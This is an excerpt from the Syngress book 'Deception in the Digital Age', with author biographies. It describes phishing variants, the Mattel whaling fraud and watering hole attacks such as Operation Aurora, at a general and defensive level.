BACKGROUND IMAGE: iSTOCK/GETTY IMAGES
The following is an excerpt from Deception in the Digital Age by authors Cameron H. Malin, Terry Gudaitis, Thomas J. Holt and Max Kilger and published by Syngress. This section from chapter five explores the different types of phishing attacks and watering hole attacks.
Almost everyone enjoys when a magician pulls off a great magic trick or illusion. Getting duped by the trickery and wondering "how did they do that" is the positive reaction desired by the magician and audience members alike. However, falling for the deception of a hacker, phisher, or scammer is never appreciated. No one wants to be tricked by the techniques used by digital con artists who want people to fall prey to their sleight of hand.
Social engineering is a practice used in magic and Shulman (2015) states, "social engineering is one of the most powerful tools in the hacker's arsenal." A Smithsonian Magazine interview with the renowned magician Teller (of Penn and Teller) revealed seven of his secrets of how he deceives his audiences and uses to psychology to manipulate their minds. Of these seven secrets, several relate directly to the social engineering and hacking techniques used by phishers, scammers, and other online con artists. Four key points from Teller (2013) include:
- exploit pattern recognition;
- keep the trickery outside the frame;
- nothing fools you better than the lie you tell yourself; and
- if you are given a choice, you believe you have acted freely.
This chapter focuses on social engineering and how the digital sleight of hand is used in a variety of cyber attacks including (1) phishing, (2) watering hole attacks, and (3) scareware.
Over the years, there have been many definitions of phishing. According to the InfoSec Institute (2016), "Phishing is an attempt by Internet fraudsters to access and obtain personal and sensitive information, such as usernames, passwords, and financial information, by utilizing social engineering techniques." This type of fraud is actually quite old, dating back to the 1990s when Internet Service Providers (ISP) billed users by the hour for access. Skilled hackers would try to capture the usernames and passwords of unsuspecting victims by posing as an ISP, especially America Online due to its scope and penetration in the market. Fraudsters would harvest known AOL email addresses and send messages claiming to need account updates or validation of user profiles. The mass mailing strategy was like fishing, in that they were hoping to hook victims through deceptive bait. The term "phishing" emerged as a corruption of the term akin to that of phreaking within the general argot of the hacker community. Unsuspecting victims who thought these messages to be legitimate would forward their information to the sender in the hopes of correcting their account. The fraudsters, however, would keep the accounts for their own use or trade the information with others for pirated software or other information.
Deception in the Digital Age
Authors: Cameron H. Malin, Terry Gudaitis, Thomas J. Holt and Max Kilger
Learn more about Deception in the Digital Age from publisher Syngress
At checkout, use discount code PBTY25 for 25% off this and other Elsevier titles
When looking at phishing through the lens and "secrets" told by Teller (2013), the phisher attempts to bait the user by hoping that their emails would:
- be recognized by having the right look and feel of legitimate communications previously received (exploit pattern recognition);
- use tricks outside the frame such as spoofing the email address so that a valid looking sender address is viewed on the "sent line" while the real deception can be seen in the email header (keep trickery outside the frame);
- rely on the theory that most humans will want to do the right thing and fix their account data even if they suspect that their account data is fine or that they do not even have an account with the company allegedly sending the email (nothing fools you better than the lie you tell yourself); and
- rely on the theory that most humans will "choose" to act and provide the requested information, particularly if there is a negative consequence attached if action is not taken (if you are given a choice, you believe you have acted freely).
Phishing messages often mimic legitimate communications from financial institutions and service providers, such as PayPal or eBay. The message usually contains some of the branding and language commonly used by that institution in an attempt to convince the recipient that the message is legitimate. The message usually suggests that a person's account has been compromised, needs to be updated, or has some problem that must be corrected as soon as possible. The time-sensitive nature of the problem is commonly stressed to confuse or worry the prospective victim in order to ensure a rapid response.
To that end, the email will also include web links that appear to connect to the appropriate website so that the victim can immediately enter their login information for the affected account. Generally, however, the link redirects the user to a different site controlled by the scammer that utilizes collection tools to capture user data. More sophisticated fraudulent sites will also feature branding or logos from the institution to help further promote the legitimacy of the phishing email. Upon arriving at the site, individuals are prompted to enter sensitive information, such as their bank account number, username, password, or even in some cases, personal identification numbers to validate their account. Upon entering the data, it is captured by the scammer for later use and may either redirect the victim back to the original website for the company or provide a page thanking them for their information.
The success of phishing techniques led some to begin to target e-commerce and online banking sites as they became popular with larger segments of the population in the early 2000s. Hackers began to recognize the value in targeting these institutions, and some began to create sophisticated phishing kits that came preloaded with the images and branding of the most prominent global banks. These kits, combined with spam email lists, enabled hackers to readily steal financial data from thousands of unsuspecting users around the world. In fact, the problem of phishing has become so commonplace that over 38,000 unique phishing websites were identified in June of 2013 alone (Anti-Phishing Working Group, 2013). These sites were hosted primarily in the United States due in part to the substantive proportion of hosting resources available to hackers, along with Germany, Canada, France, and the United Kingdom (Anti-Phishing Working Group, 2013). Thus phishing is a global problem that cannot be understated, though the prevalence of phishing victimization in the general population is largely unknown.
Since 2006, phishing has evolved into several variants including Voice over Internet Protocol (VoIP)/Voice phishing (vishing), short messaging service (SMS) phishing (smishing), spear phishing, and whale phishing. When phishing started in the 1990's, there were no smartphones, tablets, or apps. No one had text messaging, social media, or Wi-Fi yet. Thus as these new technologies and devices emerged, phishing evolved and proliferated to take advantage of the vast expanding digital environment. All of these phishing variations are based on the same premise as traditional email phishing; the scammers are just using different attack vectors. Smishing is defined as phishing via text message, and vishing is when victims are persuaded to disclose personal details or transfer money over the telephone, cellphone, or VoIP (Keyworth, 2016).
Read an excerpt
Download the PDF of chapter five in full to learn more!
Spear phishing and whale phishing differ a bit from traditional phishing because the victims of these scams are specifically targeted and not part of a mass emailing. There are numerous reasons why a phisher would want to target a specific person. According to the InfoSec Institute (2016), spear phishing is a method used by hackers to gain personal or valuable information and ultimately to gain access to a network by targeting particular individuals within an organization; the first notable cases of spear phishing attacks were recognized around the year 2010.
Spear phishing attacks have targeted government agencies, corporations, banking clients, and universities. The techniques are all very similar, luring the selected group to click a link, download a file, or open an attachment. In the example in Fig. 5.1
below, a typical spear phishing email includes the core elements of deception as the scammers try to coerce university webmail users into giving up personal identifiable information.
Instead of targeting a population that belongs to a certain organization, spear phishers also send out large volumes of scam emails, which have a high probability of reaching real users of a particular service. Over the years, services like PayPal have been used as phishing lures to collect account data and passwords from legitimate PayPal users. In the example below, the spear phish actually uses the account holder's correct name and email address. Other elements of the phishing email appear to be real, as the scammers use the company's logo and do not make some of the spelling and grammatical errors commonly seen in spam. One of the tricks presented is to hide the actual URL where the user would put in username, password, and account information. But if the user hovers the mouse/cursor over the link, the real URL will appear; in this example case, the actual URL goes to a site in Russia. The example in Fig. 5.2 uses a fictitious company (ElectroPay Service); however, the elements of deception are typical.
Around the same time period, other industrious hackers went after persons of notoriety or high net worth, otherwise known as "whales." The idea was that targeting those with power, influence, and money would reap better rewards for the attackers. Whale phishing has more recently morphed into "whaling," in which the scammers are using legitimate executive names and email addresses to persuade unsuspecting employees to wire money, sensitive business documents, tax forms, or human resource information to their accounts (Boulton, 2016). Whether the attack vector is email, phone, or text message, the underlying deceptive techniques are basically the same, using deceptive techniques to take advantage of our emotions, cognitive biases, and human physiology (i.e., fatigue, illness, injury).
One well-publicized whaling attack targeted the toy company, Mattel. In 2015, an account executive appeared to receive an email from the CEO of Mattel requesting that a payment be made to a new vendor in China. While nothing appeared to violate policy, procedure, or protocol (and the account executive wanted to impress the new CEO), a payment was made to the "new vendor" (Ragan, 2016). Of course, there was no new vendor. Mattel lost three million dollars because of an orchestrated social engineering attack. Remember Teller's "secret sauce of deception":
- exploit pattern recognition: the email appeared to come from the CEO and looked legitimate;
- keep the trickery outside the frame: the IP address associated with the sent email did not originate from within the company, and the money was not wired to a named vendor's account but to an unnamed bank account number;
- nothing fools you better than the lie you tell yourself: the account executive was convinced that sending the money was the right thing to do (even though it was a banking holiday in China and their new vendor would also most likely be on holiday); and
- if you are given a choice, you believe you have acted freely: the account executive wanted to please the new CEO and not wiring money to the new vendor would have certainly been insubordination (although the account executive never initiated a verbal confirmation with the real CEO).
Audience members attending a magic show typically do not shout out or ask, "hey, what is in your other hand?"…but when it comes to digital deception, it becomes necessary to ask. If a certain communication is asking for too much information or highly sensitive information, it is worth the while to ask and to do the asking via a different communications mode. If the communication comes in through email, call the would-be sender. If the communication comes in through text message, use email. While in some circumstances it may be unusual or uncomfortable to double-check, no one wants to be duped, and certainly not out of millions of dollars.
Watering Hole Attacks (Strategic Web Compromises)
As victim organizations and users have become more cautious and aware of spear phishing attacks, cyber attackers have developed new, creative methods to circumvent technical countermeasures and user vigilance. One of these burgeoning attack methods, watering hole attacks, or strategic web compromises, shifts the attack vector away from targeting victim communication platforms, particularly email, to compromising web servers, and in turn, the target victim group(s) that are known or likely to navigate to the website.
Gaining salience in 2009, and sophisticatedly evolving over time, watering hole attacks pose a challenging threat to defend against. While the attack name is certainly curious on first impression, it is thematically accurate, since it is based off of the observed process in nature where concealed predators wait near small bodies of water used by their prey to drink and cool off, striking while prey are otherwise distracted (Fig. 5.3).
One of the most prominent examples of a watering hole attack is the security incident dubbed Operation Aurora by the security vendor McAfee. In 2009, as many as three groups of very sophisticated Chinese hackers compromised multiple high-level targets including Google, Adobe, Juniper Networks, Yahoo, Symantec, Northrop Grumman, and Dow Chemical (Shmugar, 2010; Zetter, 2010). The attackers utilized various methods to gain access to these institutions, though one of the most prevalent attack techniques was a watering hole strategy employed by a group referred to as the Elderwood Gang (Clayton, 2012). The group would spear phish employees to click on links to a website hosting malware that would exploit a specific zero-day vulnerability in the Internet Explorer web browser. From there, the attackers appeared to use these infected systems as launch points to identify and compromise source code repositories within these companies (Markoff & Barboza, 2010; Zetter, 2010).
In 2013, the sophistication of strategic web compromises escalated, leading to high-profile breaches. In particular, a watering hole attack was used in 2013 that targeted a page regarding Site Exposure Matrices (SEM) on the US Department of Labor's website (Kaplan, 2013). The page contained a malicious script that directed victims to a separate page hosting the Poison Ivy remote access Trojan and used an exploit for a common vulnerability in the Microsoft Internet Explorer browser that had been patched a few months prior to this incident. The content of the page that was compromised gives some potential insights into the target of the attack, as the SEM page details toxic substances commonly present at nuclear sites and the potential health concerns stemming from exposure to those materials (Kaplan, 2013). Further, sophisticated watering hole attacks such as those attributed to the "Hidden Lynx" hacking group, who were responsible for the VOHO Campaign and the attacks against security Bit9, demonstrated how potent these attacks could be, even against technically sophisticated victims.
With the success of these attacks, cyber adversaries continued this momentum into 2014 and 2015. With new web browsers such as Internet Explorer 10 emerging, attackers quickly developed zero-day exploits to insidiously compromise these programs, stealthily placing these tools in secretly compromised websites trusted by the victims who visited them. The aerospace and automotive industries were heavily targeted, revealing the attacker's victim selection, motivations, and willingness to craft, refine, and patiently execute strategic web compromises against these highly desired victims.6 Understanding the watering hole attack deception chain and the deception principles implemented by the attackers helps elucidate why these pernicious attacks are successful and will continue to be a threat in the cyber landscape.
About the authors:
Cameron H. Malin is a Certified Ethical Hacker (C|EH) and Certified Network Defense Architect (C|NDA) as designated by the International Council of Electronic Commerce Consultants (EC-Council); a GIAC Certified Intrusion Analyst (GCIA), GIAC Certified Forensic Analysis (GCFA), a GIAC Certified Incident Handler (GCIH), GIAC Certified Reverse Engineering Malware professional (GREM), GIAC Penetration Tester (GPEN), and GIAC Certified Unix Security Administrator (GCUX) as designated by the SANS Institute; and a Certified Information Systems Security Professional (CISSP), as designated by the International Information Systems Security Certification Consortium ((ISC)2®).
Mr. Malin is currently a Supervisory Special Agent with the Federal Bureau of Investigation assigned to the Behavioral Analysis Unit, Cyber Behavioral Analysis Center. He is also a Subject Matter Expert for the Department of Defense (DoD) Cyber Security & Information Systems Information Analysis Center and Defense Systems Information Analysis Center. Mr. Malin was previously an Assistant State Attorney (ASA) and Special Assistant United States Attorney in Miami, Florida, where he specialized in computer crime prosecutions. During his tenure as an ASA, he was also an Assistant Professorial Lecturer in the Computer Fraud Investigations Masters Program at George Washington University.
The techniques, tools, methods, views, and opinions explained by Cameron Malin are personal to him, and do not represent those of the United States Department of Justice, the Federal Bureau of Investigation, or the government of the United States of America. Neither the Federal government nor any Federal agency endorses this book or its contents in any way.
Dr. Terry Gudaitis is the Owner/Principal of Mindstar Security & Profiling, LLC which specializes in custom cyber and physical security solutions for family offices, high net worth inidividuals, and their families. She started her career as a CIA operations officer and behavioral profiler. Dr. Gudaitis left government service to pursue the expansion of profiling techniques as they applied to hackers targeting the financial services and energy sectors. She altered classic behavioral/psychological profiling methods used in homicide, serial crime, and terrorist investigation and adapted them for the applied use in computer crime investigations which included the integration of cyber intelligence as part of the investigations process. Prior to forming her own firm, Dr. Gudaitis was the Vice President and Cyber Intelligence Director at Cyveillance and held senior positions at other private sector firms. In addition to her corporate related work, she is on the Advisory Boards of Mi3 Security Inc. and TechnoSecurity; has served on the United States Secret Service Advisory Board for Insider Threat; trained investigators at the National Center for Missing and Exploited Children; and, regularly presents at national and international conferences. Dr. Gudaitis is also a featured speaker at the International Spy Museum in Washington, DC. She received a Ph.D. in behavioral science from the University of Florida.
Dr. Thomas Holt is a Professor in the School of Criminal Justice at Michigan State University specializing in cybercrime, policing, and policy. He received his Ph. D. in Criminology and Criminal Justice from the University of Missouri-Saint Louis in 2005. Dr. Holt has published extensively on cybercrime and cyberterror with more than 35 peer-reviewed articles in outlets such as Crime and Delinquency, Sexual Abuse, the Journal of Criminal Justice, Terrorism and Political Violence, and Deviant Behavior. He is also a co-author of the books Cybercrime and Digital Forensics: An Introduction (2015), and Policing Cybercrime and Cyberterror (2015). Dr. Holt has also received multiple grants from the National Institute of Justice and the National Science Foundation to examine the social and technical drivers of Russian malware writers, data thieves, and hackers using on-line data. He has given multiple presentations on computer crime and hacking at academic and professional conferences, as well as hacker conferences across the country including Defcon and HOPE.
Max Kilger, Ph.D. is a Senior Lecturer in the Department of Information Systems & Cyber Security at the University of Texas at San Antonio (UTSA) and also the Director of the Masters in Data Analytics Program at UTSA. He received his Ph.D. in Social Psychology from Stanford University. Dr. Kilger has more than seventeen years of experience in the area of information security, concentrating on the social and psychological factors motivating malicious online actors, hacking groups and cyberterrorists. He has written and co-authored a number of journal articles and book chapters on profiling, the social structure of the hacking community, cyberviolence and the emergence of cyberterrorism. Dr. Kilger is a founding and board member of the Honeynet Project, a not-for-profit information security organization with 54 teams of experts in 44 countries working for the public good. He was a member of a National Academy of Engineering committee dedicated to make recommendations for combating terrorism. Dr. Kilger is also a member of a multinational instructional team for a NATO counterterrorism course.